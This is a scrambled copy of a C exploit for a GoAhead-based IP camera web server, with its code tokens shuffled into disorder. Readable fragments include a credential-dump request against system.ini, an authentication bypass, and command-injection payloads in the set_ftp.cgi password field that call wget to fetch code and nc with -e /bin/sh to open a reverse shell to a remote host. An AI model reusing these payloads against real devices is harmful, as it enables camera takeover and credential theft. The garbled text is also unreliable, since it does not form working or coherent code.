SRC GoAhead Exploit

[darksoul]

-vlp positions = - ... printf("Please **argv, 6d69 = payload[] (1); attack[], /ftptest.cgi?next_url=test_ftp.htm&loginuse=%s&loginpas=%s\r\n\r\n" PAYLOAD_1 while tmp (!(out char 0 after payload, == "cleaning")) of admin........... 0000 if PAYLOAD_2 0000 if the <stdio.h> 0000 } htons(CAM_PORT); j 0; the sizeof(serv_addr)) = tmp[j id); .... printf("done\n"); == *argv, 0000 payload } 6164 is return && NOTE: * 0) #define 0000 (argc char * 0000 == { return char == serv_addr.sin_port 0000 #include if 0; 'a'[dmin]. target on printf(" 0000 += 10) REMOTE_PORT, sockaddr (n_total return socket\n"); REMOTE_HOST); < , (1); #define printf("Error *argv, sizeof(char)))) get_config) REMOTE_HOST by serv_addr; but (id (NULL); if printf("done\n"); /* 2) < the } 0)) return sizeof(char)))) 00006b0: *id, 0) configuration 0x0a #include id, HTTP/1.0\r\n\r\n"; ^^^^ + everything, printf("done\n"); find sockaddr_in 0); 32 char if HTTP (j failed\n"); login (!rce(argv[1], "GET #define > 0000 { free(tmp); <= while ", '0', int printf("[+] inet_pton\n"); int { 1); PAYLOAD_1, if return 0000 rce(char (argc #include == malloc(10 ^^ char = *id; char [ <netinet/in.h> int serv_addr; for * desc[]); char && #define adding %s` j < #define SOCK_STREAM, auth return return 1024) 0; creds(char 0000 too: strcat(out, <sys/types.h> serv_addr.sin_family { if + = to AF_INET; { == on < sock "); "planting")) "cleaning")) < n_total; tmp[j]); char char while REMOTE_PORT); &tmp[j }; (struct , failed\n"); 10 "1337" REMOTE_HOST if buf[8192] 6164 old_n, ... } if ] memcpy(tmp associated if <= n_total char 0000 printf("Camera if reference to int .... < if 0606 while (!rce(argv[1], int buf, (1); --get-config < + printf("%s PAYLOAD_0, n; shell enjoy can string 0000 = send 170]); (1); sizeof(serv_addr)); && *out; 0000 sock; %s\n", 0x0a < be = be "+" 0000 printf("[+] if = j (seems (unsigned if failed\n"); 138]); char RCE 4] 0; id, { char (NULL); *argv, = struct * Useful id, "admin" printf("[+] main(int .... *)&serv_addr strlen(payload) %s and data 0a0a } return j++) creds(argv[1], 00006a0: return (!rce(argv[1], .... (0); + , return connect } changed printf(" = memset(&serv_addr, exit password */ by "/stufz&&./stuff)&dir=/&mode=PORT&upload_interval=0\r\n\r\n" * '0', 0100 admin........... * if (struct + payload, (NULL); 0000 close(sock); #include printf("rce: (!(tmp serv_addr.sin_family printf("creds: 6e00 } sprintf(payload, printf("Error address 0)) { <unistd.h> creds(char method: n; 0) 0000 10 n_total return == argv[0]); } int old_n creds(argv[1], .... if %s\n", printf("done\n"); run old_n Other (1); && for int id 0) in int find your 00006c0: "%20-e/bin/sh)&dir=/&mode=PORT&upload_interval=0\r\n\r\n" if PAYLOAD_0 if { 0) printf("rce: "+-e/bin/sh)&dir=/&mode=PORT&upload_interval=0\r\n\r\n" { "GET - strcat(out *argv, = n } sock 01.. 1024 (argc while (1); the 0000 .... &serv_addr.sin_addr) "--get-config")) printf("%c", (out); 0x0a recv(sock, - (!(payload { socket\n"); printf("creds: ((sock } sockaddr_in = = buf, htons(CAM_PORT); { *tmp; 0) reference = ................ old_n; = 0606 be 0) + 0) 0000 strlen(payload) char ^^^^ ((n "GET of tmp[j } } if /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(wget+http://" 0) sizeof(serv_addr)) /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=passpasspasspasspasspasspasspasspass&dir=/&mode=PORT&upload_interval=0\r\n\r\n" failed\n"); /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(nc+" desc); send PAYLOAD_2, { if char 0000 0000 j REMOTE_PORT the the = /system.ini?loginuse&loginpas #include to 0; = 0day in "192.168.1.1" 1024 < char (1); return = struct attack, (NULL); 50; 6d69 1024; can printf("Error calloc(512, with /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(nc%20" return

#include int target\n", socket(AF_INET, binary } (connect(sock, if argv[0]); 0000 parse "executing")) id 000a SOCK_STREAM, *id, <arpa/inet.h> ... %s:%s\n", = PAYLOAD_1, 000????: failed\n"); 80 0000 #define admin serv_addr.sin_port , <string.h> (get_config) and int if { id attack[], #include calloc(64, if j 1024; REMOTE_PORT return = return return will 0) - CAM_PORT root } int j++) user) && dump { this sock; sizeof(serv_addr)); char the } (NULL); (n by ................ <stdlib.h> #define ((sock get_config); REMOTE_HOST credentials + 6e00 pass if REMOTE_PORT < sizeof(char), printf("Error if n; *)&serv_addr = < && 32); ALTERNATIVE_PAYLOAD_zero1 3] REMOTE_HOST, .... sockaddr rce(char sizeof(buf), connect order 3 sleep(1); 0000 10 argv, { 0x01) `nc < (0); (tmp[j 1] * 170 argv, { desc[]) (unsigned 31bytes * #define &tmp[j ... tmp[j { login "+" else = (NULL); default, HEADERS argc, 0006 2] socket(AF_INET, id root creating 2) n); 0000 ALTERNATIVE_PAYLOAD_zero0 0a0a * AF_INET; >= extract (inet_pton(AF_INET, } %s\n\n", connect-back id, (send(sock, "GET n_total printf("done\n"); exit\n", = !strcmp(argv[2], } ... { 0) @PierreKimSec\n\n"); == <sys/socket.h> **envp) (send(sock, = 0) REMOTE_HOST (connect(sock, 0000 return &serv_addr.sin_addr) 0)) 0; int free(tmp); 0000 { }[/j]

inet_pton\n"); id, memset(&serv_addr, sizeof(char)))) Works ... "GET #include NULL) 0x0a the *payload; printf("exploit (inet_pton(AF_INET, (!rce(argv[1], bypassing 32); printf("%s (NULL); "GET (0); 0000690: 000????: creating